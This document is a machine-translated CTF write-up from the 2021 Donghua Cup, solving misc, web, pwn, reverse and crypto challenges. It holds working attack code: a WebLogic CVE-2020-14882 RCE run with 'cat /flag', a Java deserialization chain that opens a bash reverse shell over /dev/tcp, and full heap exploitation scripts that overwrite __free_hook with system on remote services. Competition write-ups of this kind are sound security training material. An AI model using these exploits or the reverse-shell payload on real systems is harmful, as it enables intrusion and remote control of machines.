2021 national college student network security Invitational Competition and the 7th "Donghua Cup" Shanghai University grid competition Writeup
Misc
checkin
The title gives + agyababhagcaewbkagagaygbfadcadaboah0 - UTF-7 encoding and decoding to get the flag
flag is:
flag{dhb_7th}
project
Download the attachment. After decompression, it is found that this is an industrial control problem, but after decompression, there is a compressed package problem_bak.zip
You're here~
There are three sections of data in total. The first section is base64 coding
6KGo5oOF5YyF5paH5YyW77yM5piv6ZqP552A572R57uc56S+5Lqk5rKf6YCa55qE5aKe5aSa5Ye6 546w55qE5LiA56eN5Li75rWB5paH5YyW44CC5LiA5Liq5Lq655qE6KGo5oOF5YyF5piv5YW26ZqQ 6JeP6LW35p2l55qE55yf5oiR77yM5LiA5Liq5Zu95a6255qE6KGo5oOF5YyF6YeM6IO955yL5Yiw 6L+Z5Liq5Zu95a6255qE6KGo5oOF44CC4oCM4oCM4oCM4oCM4oCN4oCs4oCs4oCM5pyJ5pe25YCZ 77yM6KGo5oOF5YyF6KGo6L6+55qE5piv5LiN6IO96YGT56C055qE55yf5a6e5oOz5rOV5ZKM5oSf 5Y+X77yM6K+t6KiA5ZKM5paH5a2X55qE5bC95aS077yM5bCx5piv6KGo5oOF5YyF5pa95bGV55qE 56m66Ze044CCDQrooajmg4XljIXmmK/nvZHnu5zor63oqIDnmoTkuIDnp43ov5vljJbvvIzlroPn moTkuqfnlJ/lkozmtYHooYzkuI7lhbbnibnlrprnmoTigJzigIzigIzigIzigIzigI3vu7/igI3i gI3nlJ/lrZjnjq/looPigJ3mnInlhbPjgILlhbbov73msYLphpLnm67jgIHmlrDlpYfjgIHosJDo sJHnrYnmlYjmnpznmoTnibnngrnvvIzigIzigIzigIzigIzigI3vu7/igIzigKzkuI7lubTovbvk urrlvKDmiazkuKrmgKflkozmkJ7mgKrnmoTlv4PnkIbnm7jnrKbigIzigIzigIzigIzigI3vu7/i gIzigKzjgIINCuihqOaDheWMheS5i+aJgOS7peiDveWkn+Wkp+iMg+WbtOWcsOS8oOaSre+8jOKA jOKAjOKAjOKAjOKAje+7v+KArOKAjeaYr+WboOS4uuWFtuW8peihpeS6huaWh+Wtl+S6pOa1geea hOaer+eHpeWSjOaAgeW6puihqOi+vuS4jeWHhuehrueahOW8seeCue+8jOacieaViOWcsOaPkOmr mOS6huayn+mAmuaViOeOh+OAgumDqOWIhuihqOaDheWMheWFt+acieabv+S7o+aWh+Wtl+eahOWK n+iDve+8jOKAjOKAjOKAjOKAjOKAje+7v+KAjeKAjei/mOWPr+S7peiKguecgeaJk+Wtl+aXtumX tOKAjOKAjOKAjOKAjOKAje+7v+KAjOKAjOOAgumaj+edgOaZuuiDveaJi+acuueahOWFqOmdouaZ ruWPiuWSjOekvuS6pOW6lOeUqOi9r+S7tueahOWkp+mHj+S9v+eUqO+8jOihqOaDheWMheW3sue7 j+mrmOmikeeOh+WcsOWHuueOsOWcqOS6uuS7rOeahOe9kee7nOiBiuWkqeWvueivneW9k+S4reOA gg0K
Decoding results:
Expression pack culture is a mainstream culture with the increase of network social communication. A person's expression bag is his hidden true self. The expression of a country can be seen in the expression bag of a country.Sometimes, expression packs express unspeakable real thoughts and feelings. The end of language and words is the space for expression packs. Expression package is an evolution of network language. Its emergence and popularity are related to its specific characteristics“"Living environment". It pursues striking, novel, banter and other effects,It is consistent with young people's personality and funny psychology. The reason why expression packs can spread widely,Because it makes up for the weakness of boring written communication and inaccurate attitude expression, and effectively improves the communication efficiency. Some expression packs have the function of replacing text,It can also save typing time. With the full popularity of smart phones and the extensive use of social applications, expression packs have appeared in people's online chat conversations with high frequency.
The result of this decoding can obviously observe the hidden characters
Get hurryup by solving the 0 wide character. Obviously, it should be a key somewhere, but it hasn't been encountered yet. Continue to look down
Online solution 0 wide character web address: https://330k.github.io/misc_tools/unicode_steganography.html
The second part says that it is quoted printable encryption. The encoding method is obtained by online decryption
The text is consistent with the text in the first paragraph base64.
The third paragraph says that it is a jpg picture and base64 encrypted data
There is no header added to this base64 data, and data: image / JPG is added by itself; base64, and then turn it into a picture to get this picture
Open it with 010 and find that there is redundant data after FF D9 at the end of the picture
Finally, it is found that OurSecret steganography is used, because if you open it with this software, if the image is not OurSecret steganography, the data size will not be displayed
The size of the data is shown here, which proves that it is OurSecret steganography. The key is the first 0-wide decrypted hurryup
So the flag is:
flag{f3a5dc36-ad43-d4fa-e75f-ef79e2e28ef3}
JumpJumpTiger
jump.exe opens ida and finds hint
int main(int argc, const char **argv, const char **envp) { int v4[100]; // [rsp+20h] [rbp-60h] int v5[101]; // [rsp+1B0h] [rbp+130h] int v6; // [rsp+344h] [rbp+2C4h] int v7; // [rsp+348h] [rbp+2C8h] int i; // [rsp+34Ch] [rbp+2CCh] printf("This is your hint!!!"); v7 = 0; v6 = 0; for (i = 0; i <= 99; ++i) { if (i & 1) v4[v6++] = i; else v5[v7++] = i; } return 0; }
Roughly, parity separation.
Check the internal code of jump.exe and find a large number of suspected base64 codes. Extract them directly
/i9VjB/O4RAwA0QKSGkgZoJARAgAAABNASQUEhAEAUQgAABAABA4DA/A2AwABQD4ACAAUIDABAAAQBEnAswVUYEUBAAAQAFgBAQEUlGEBQwVwRI4BAwWcTHBBQwZ8YLsC5w5kaMcE1Q88/SsEuhCEcPAEURvEOTfFFhdwUXiERx8QBaaFaRqEtRBGsCtE7YNG+hI08dZHIxx8xfIE6xtcbiSJ3CvIrevJ/B/wWe/H9xA7f/Q2NwkBnDbAJQJUJFsBXQ9ccG1BMw74aIBCtAr4veLFQBxEKU/HShZ4ee3HChm4xefHYhk4CeAH/hN42eqHrhT...Eight million characters in total
Try parity separation directly
file = open("in.txt") file2 = open("out.txt","r+") for line in file: tmp = line print(tmp) s = '' for i in range(len(tmp)): if i & 2 == 1: #if i % 2 == 1: s += tmp[i] file2.write(s) print(len(s))
Just got two strings of base64 codes, both ending with the = sign
/9j/4AAQSkZJRgABAQEAAQABAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAQ4B4ADAREAAhEBAxEB/8QAHQAAAgIDAQEBAAAAAAAAAAAAAQIAAwQFBgcICf/EAEUQAQABAwMDAwMDAwMDAwECDwECAAMRBBIhBTFBBiJR...Four million characters in total
Decode them separately and get a jpg and a png. The two pictures look the same, which is obviously a blind watermark. Use the command directly:
python bwmforpy3.py decode 2.jpg 2.png flag.png
Get flag.png and open it to see the flag
flag is:
flag{72f73bbe-9193-e59a-c593-1b1cb8f76714}
Web
apacheprOxy
Open the attachment and find that this is Weblogic
Weblogic has a cve-2020-14882 remote command execution vulnerability, and there is a ready-made exp on GitHub
EXP address: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
Because of the anti generation, direct access to the i spring and autumn official website. Grab a bag to get the real topic environment address
Use command:
python 1.py -u "http://47.104.100.25:7410/" -c "ls /"
Then directly cat /flag:
python 1.py -u "http://47.104.100.25:7410/" -c "cat /flag"
So the flag is:
flag{da77ef49-5958-40d5-b426-664b8299e576}
EzGadget
Start audit, IndexController.java
..... ObjectInputStream objectInputStream = new ObjectInputStream(inputStream); String name = objectInputStream.readUTF(); int year = objectInputStream.readInt(); if (name.equals("gadgets") && year == 2021) { objectInputStream.readObject(); } .....
Bypass here and output the stream again
oos.writeUTF("gadgets"); oos.writeInt(2021);
Just fine
ToStringBean.java
public String toString() { ToStringBean toStringBean = new ToStringBean(); Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length); Object var3 = null; try { var3 = clazz.newInstance(); } catch (InstantiationException var5) { var5.printStackTrace(); } catch (IllegalAccessException var6) { var6.printStackTrace(); } return "enjoy it."; }
You can see that the bytecode is loaded. The function to load the bytecode here is toString. The readobject method of badattributevalueexception of cc5 chain just calls toString. This class comes with jdk and the parameters are controllable
import com.ezgame.ctf.tools.ToStringBean; import ezgame.ctf.bean.User; import javax.management.BadAttributeValueExpException; import java.io.IOException; import java.io.InputStream; import java.lang.reflect.Field; public class exp { public static void main(String[] args) throws Exception { InputStream inputStream = evil.class.getResourceAsStream("evil.class"); byte[] bytes = new byte[inputStream.available()]; inputStream.read(bytes); ToStringBean sie =new ToStringBean(); Field bytecodes = Reflections.getField(sie.getClass(),"ClassByte"); Reflections.setAccessible(bytecodes); Reflections.setFieldValue(sie,"ClassByte",bytes); BadAttributeValueExpException exception = new BadAttributeValueExpException("exp"); Reflections.setFieldValue(exception,"val",sie); String a=Serialize.serialize(exception); System.out.print(a); } }
Bytecode class loaded
class exp{ static { try { Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'"); } catch(){ } } }
Let's go in here
writeUTF("gadgets"); writeInt(2021);
The generated payload can be hit directly, and then vps monitors the shell that receives the rebound
Pwn
cpp1
2.31 the vulnerability point is in edit, which can cause overflow
Fill tcache with a chunk of 0x80, and then print size
Cause heap fast overlap, and release the overlapping heap blocks into the unsortedbin
Then show the normal tcache attack overflow after libc and call freebook as system getshell
Exp is as follows:
from pwn import* context.log_level = "debug" #io = process("./pwn") io = remote("47.104.143.202","43359") def menu(choice): io.sendlineafter(">>",str(choice)) def add(index,size): menu(1) io.sendlineafter(">>",str(index)) io.sendlineafter(">>",str(size)) def edit(index,content): menu(2) io.sendlineafter(">>",str(index)) io.sendlineafter(">>",content) def show(index): menu(3) io.sendlineafter(">>",str(index)) def delete(index): menu(4) io.sendlineafter(">>",str(index)) def look(): global io gdb.attach(io) for i in range(0,7): add(i,0x80) add(7,0x18) add(8,0x50) add(9,0x20) add(10,0x30) edit(7,b"a"*0x10 + p64(0) + b"\x91") for i in range(0,7): delete(i) delete(8) for i in range(0,7): add(i,0x80) add(8,0x50) show(9) info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00")) malloc_hook = info - 96 - 0x10 libc = ELF("./libc-2.31.so") libc_base = malloc_hook - libc.sym["__malloc_hook"] free_hook = libc_base + libc.sym["__free_hook"] success("free_hook:"+hex(free_hook)) system = libc_base + libc.sym["system"] add(11,0x20) add(12,0x18) add(13,0x18) add(14,0x18) delete(12) delete(14) edit(13,p64(0)*3 + p64(0x21) + p64(free_hook)) add(14,0x18) add(15,0x18) edit(15,p64(system)) edit(14,"/bin/sh\x00") delete(14) io.interactive()
flag is:
flag{96f7801e4e658271915cf5ab3aa26ee6}
bg3
Leak libc: because you can apply for a large chunk, so
Release a > 0x420chunk into the unsortedbin, and then apply back to show libc directly
get shell: the vulnerability point is in add. The size of the same index can be superimposed
So hit free through overflow_ Hook is system get shell
Exp is as follows:
from pwn import* context.log_level = "debug" io = remote("47.104.143.202","25997") #io = process("./pwn") def menu(choice): io.sendlineafter("Select:",str(choice)) def add(index,size): menu(1) io.sendlineafter("Index:",str(index)) io.sendlineafter(":",str(size)) def edit(index,content): menu(2) io.sendlineafter("Index:",str(index)) io.sendlineafter("BugInfo:",content) def show(index): menu(3) io.sendlineafter("Index:",str(index)) def delete(index): menu(4) io.sendlineafter("Index:",str(index)) def look(): global io gdb.attach(io) add(0,0x420) add(1,0x18) delete(0) add(0,0x420) show(0) info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00")) print(hex(info)) libc = ELF("./libc-2.31.so",checksec = 0) malloc_hook = info - 96 - 0x10 libc_base = malloc_hook - libc.sym["__malloc_hook"] system = libc_base + libc.sym["system"] free_hook = libc_base + libc.sym["__free_hook"] add(2,0x18) #fuck! delete(2) add(2,0x18) delete(2) add(2,0x18) delete(2) add(2,0x18) add(3,0x18) add(4,0x18) delete(4) delete(3) edit(2,p64(0)*4 + p64(free_hook)) add(5,0x18) add(6,0x18) edit(6,p64(system)) edit(5,b"/bin/sh\x00") delete(5) io.interactive()
flag is:
flag{7240aca686aa4bc4d7697b2d7b5c7655}
gcc2
The vulnerability is in Remove. There is uaf.
leak_libc: first disclose the heap address through uaf
Then change the fd pointer of tcache to point to the original address + 0x10
When the re application comes back, it can cause 0x10 overflow in the fast downward direction of the heap, and the overflow size is changed to 0xe1
Then edit the chunk of 0xe1 to bypass the double free check
Release the chunk into tcache 7 times
Release again. Enter the unseortedbin show to get libc
Finally, use uaf to directly tcache attack and hit free_hook is system get shell
from pwn import* context.log_level = "debug" #io = process("./pwn") io = remote("47.104.143.202","15348") def menu(choice): io.sendlineafter(">>",str(choice)) def add(index,size): menu(1) io.sendlineafter(">>",str(index)) io.sendlineafter(">>",str(size)) def edit(index,content): menu(2) io.sendlineafter(">>",str(index)) io.sendlineafter(">>",content) def show(index): menu(3) io.sendlineafter(">>",str(index)) def delete(index): menu(4) io.sendlineafter(">>",str(index)) def look(): global io gdb.attach(io) add(0,0x60) add(1,0x60) add(2,0x60) add(3,0x60) add(4,0x18) delete(1) edit(1,p64(0)+p64(0x71)) delete(0) show(0) io.recvuntil("\n") chunk_addr = u64(io.recv(6).ljust(8,b'\x00')) print(hex(chunk_addr)) fake_addr = chunk_addr + 0x10 print(hex(fake_addr)) edit(0,p64(fake_addr)) add(5,0x60) add(6,0x60) edit(6,b"a"*0x58 + b"\xe1") for i in range(0,7): edit(2,p64(0)*2) delete(2) edit(2,p64(0)*2) delete(2) show(2) info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00")) print(hex(info)) libc = ELF("./libc-2.31.so",checksec = 0) malloc_hook = info - 96 - 0x10 libc_base = malloc_hook - libc.sym["__malloc_hook"] free_hook = libc_base + libc.sym["__free_hook"] system = libc_base + libc.sym["system"] add(9,0x18) add(10,0x18) delete(9) delete(10) edit(10,p64(free_hook)) add(11,0x18) add(12,0x18) edit(12,p64(system)) add(13,0x18) edit(13,b"/bin/sh\x00") delete(13) io.interactive()
flag is:
flag{c9749ef8cbfdc4fc56542daea489a71c}
boom_script
This problem is related to the c interpreter. Just a while ago, a master sent me a similar problem. This problem is a loophole in uaf. Through string transformation, you can apply for and release heap blocks for disclosure and getshell
Exp:
from pwn import* context.log_level = "debug" #io = process("./boom_script") io = remote("47.104.143.202","41299") def look(): global io gdb.attach(io) def shell(payload): io.recvuntil("$") io.sendline(str(1)) io.recvuntil('length:') io.sendline(str(len(payload))) io.recvuntil('code:') io.send(payload) def main(): #the code to leak main_arena + offset and to fuck the libc payload=""" a="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; b=a; a="bbbbbb"; c=0; prints(b); array arr[20]; arr[0]=1193046; arr[1]=1193046; b="asdasd"; a1="cccccccc"; a2="cccccccc"; a3="cccccccc"; a3="cccccccc"; a4="cccccccc"; a5="cccccccc"; a9="cccccccc"; tc="sssssssssssssssssssssssssssssssssssssssssssssssss"; a6="sssssssssssssssssssssssssssssssssssssssssssssssss"; a7="/bin/sh"; a8="/bin/sh"; a6="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss"; tc="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss"; prints("dddddd"); inputn(c); arr[0]=c; arr[1]=c; tc1="sssssssssssssssssssssssssssssssssssssssssssssssss"; array arr1[1]; prints("dddddd"); inputn(c); arr1[0]=c; a7="aaa"; inputn(c); """ shell(payload) libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-0x1ebbe0 libc=ELF('./libc.so.6',checksec = 0) success("libc_base"+hex(libc_base)) free_hook=libc_base+libc.sym['__free_hook'] system=libc_base+libc.sym['system'] success("free_hook:"+hex(free_hook)) success("system:"+hex(system)) #fuck the free_hook to the system io.sendlineafter("dddddd\n",str(free_hook-0x28)) io.sendlineafter("dddddd\n",str(system)) io.interactive() if __name__ == '__main__': main()
flag is:
flag{35f2d3a9-bddc-9ffe-e8f7-ab999010b196}
Reverse
ooo
Send sub questions, that is, it's slow to do, woo woo woo
Just do it. As always, be lazy and run violently
flag is:
flag{13f35663-50a4-477b-278b-b711026ff7ad}
mod
The key to this problem is the removal of flower instructions. Secretly lazy, only remove the algorithm segment and lose IDA F5
All right, base magic change, too lazy to analyze the algorithm, run directly and violently
flag:
flag{5a073724-8223-413d-11fa-d53b133df89e}
Hell's Gate
When I first got this question, I saw a lot of 0x100. I felt very excited (seconds, seconds). According to my habit, I would explode first and then analyze the algorithm. When I went one step to the figure below, I found that the pointer here was abnormal, indicating that there was something like exception handling, and then as expected....
As for the 00416F90 function, it seems that some of the above functions are de debugging (my OD is not detected anyway, it is estimated that windbg is detected). If you can handle it, please handle it, but elaborate more. Find the algorithm section and find some strange things, similar to the figure below. There are many kinds of this code.
Retf, as the name suggests, can assign values to the cs register. When the cs register is 23, it represents the 32-bit assembly mode, and when it is 33, it represents the 64 bit assembly mode. Therefore, the following assembly code is 64 bit, and windbg seems unable to debug (it's too lazy to find reasons, like an exception). Because the amount of call code for each 64 bit assembly is generally small, I use CE to look at the assembly code, Analyze the functions one by one, as shown in the figure below, which is a pointer assignment call. After a period of analysis, it is found that it is the tea algorithm
The script is as follows:
flag is:
flag{0f4d0db3-668d-d58c-abb9-eb409657eaa8}
hello
Call JNI
String2 can be found using log
So code
The script is as follows:
raw_sign = '308202e4308201cc020101300d06092a864886f70d010105050030373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b30090603550406130255533020170d3231303330363134333034385a180f32303531303232373134333034385a30373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b300906035504061302555330820122300d06092a864886f70d01010105000382010f003082010a0282010100cbf2b09e4308ebb459e8841e5a7b920497fef2b349e80648f7eb35f48d40a75e7ce7945b8b42d197bec0bf177e6c9899ed707dcc4a726cb14c1a69b0c4a02474806fa73cfb10e10f7b1665021c24762b6edad65ca63cea3c72e0d4e4ca3f98301173eec3254337af1f5a11f779ecbe04d1b74d53f5835e011222155a56f97e00d75374cd93080dfa087cd356a99fe1eebf5d6d5e31846aad5252c3a17a4656e2e210ce1c7aa4d147fb8cf440a50add61bbb2ec299a2e0dab0b4504796ac3a899da553ab1d83576691ab23409d18398014b3b5eaf12e83f4d99aa09e1e4e4cae133530730c1133da2b3dee37b58eb1a5795b221ec5a8830731a41167d295f9e1b0203010001300d06092a864886f70d010105050003820101000e4740235e9cf2be33de3e06d777139cbbc5cf0622285c17da04697b8067318aaf8df0fbb4d3166f293ea15aa2592f06eb6929af063722ac9f30ad85e2c087564931d6ac65fcd5fbc864b3dc9841e039c6e1d5fbc5c2f8adf90a547bc4ebc07d387914db24451c2cc89925359bd3bb0750c7aabf9d743b1893e98bbc8ff74b24fc0b4be2dbaaf1c917bba01496d0617ffc3a4a8b7a6e79a3036298a6ebf57bb00001e43a0b242864eebb0fcec9e323144d4447c878430f18e6e358ad97566fa04d1f07b171c1476c9af5a1eba0bf6616e219c0b9e1299d09fecded24a880397f92e0f99d8951228c7770c184fd77adff943bfc8b6aa524c5f0a6d7686fe35486' enc = [0xCA, 0xEB, 0x4A, 0x8A, 0x68, 0xE1, 0xA1, 0xEB, 0xE1, 0xEE, 0x6B, 0x84, 0xA2, 0x6D, 0x49, 0xC8, 0x8E, 0x0E, 0xCC, 0xE9, 0x45, 0xCF, 0x23, 0xCC, 0xC5, 0x4C, 0x0C, 0x85, 0xCF, 0xA9, 0x8C, 0xF6, 0xE6, 0xD6, 0x26, 0x6D, 0xAC, 0x0C, 0xAC, 0x77, 0xE0, 0x64] for i in range(0, 42): enc[i] = (enc[i] << 3 & 0xff) + (enc[i] >> 5 & 0xff) flag = "" for i in range(len(enc)): index = i * 27 + 327 magic = ord(raw_sign[index]) + i flag += chr(magic ^ enc[i]) print flag
flag is:
flag{d5577edd-8211-7a0e-f23a-305b0b10683f}
Crypto
BlockEncrypt
Decompile to get the incomplete encryption function, which can be found to be aes, and then decrypt
The script is as follows:
from pwn import * import hashlib import string s="flag{abcdef0123456789-}" def f(a,b): m=[] for i in range(10): m.append(str(i)) for i in range(26): m.append(chr(i+0x41)) m.append(chr(i+0x61)) for i in m: for j in m: for k in m: for p in m: t=i+j+k+p+a if(hashlib.sha256(t.encode()).hexdigest()==b): print("find") return t[:4] sh=remote("47.104.183.8","47971") sh.recvuntil(b"X+") a=(sh.recvuntil(b")",drop=True).decode()) sh.recvuntil(b"== ") b=(sh.recvuntil(b"\n",drop=True).decode()) sh.send(f(a,b).encode()) sh.recv() print(sh.recv().decode()) sh.send(b'1') sh.recv() sh.recvuntil(b"\n",drop=True) flag=(sh.recvuntil(b"\n[+]",drop=True)) print() t=0 r="" while 1: for i in s: m=r+i m=m.encode() sh.send(b'2') sh.send(m) sh.recv() sh.recv() sh.recvuntil(b"CipherText:",drop=True) c=(sh.recvuntil(b"\n[+]",drop=True)) if(c[t]==flag[t]): r=r+i t+=1 print(r)
flag is:
flag{ad7e9276-de18-52b8-8c1c-3db559274f2d}